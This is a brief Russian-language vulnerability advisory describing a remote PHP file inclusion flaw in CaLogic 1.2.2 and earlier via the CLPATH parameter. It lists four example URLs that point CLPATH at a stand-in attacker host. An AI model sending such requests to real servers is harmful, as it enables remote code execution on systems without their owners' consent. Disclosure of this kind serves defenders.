Программа: CaLogic 1.2.2 и более ранние версии

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре CLPATH при
включенных опциях register_globals и allow_url_fopen в
конфигурационном файле PHP. Злоумышленник
может с помощью специально сформированного
URL выполнить произвольный PHP сценарий на
целевой системе.

Примеры:

http://[vitim]/calogic/cl_minical.php? CLPATH=http://attacker
http://[vitim]calogic/clmcpreload.php? CLPATH=http://attacker
http://[vitim]/calogic/mcconfig.php? CLPATH=http://attacker
http://[vitim]/calogic/mcpi-demo.php? CLPATH=http://attacker

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии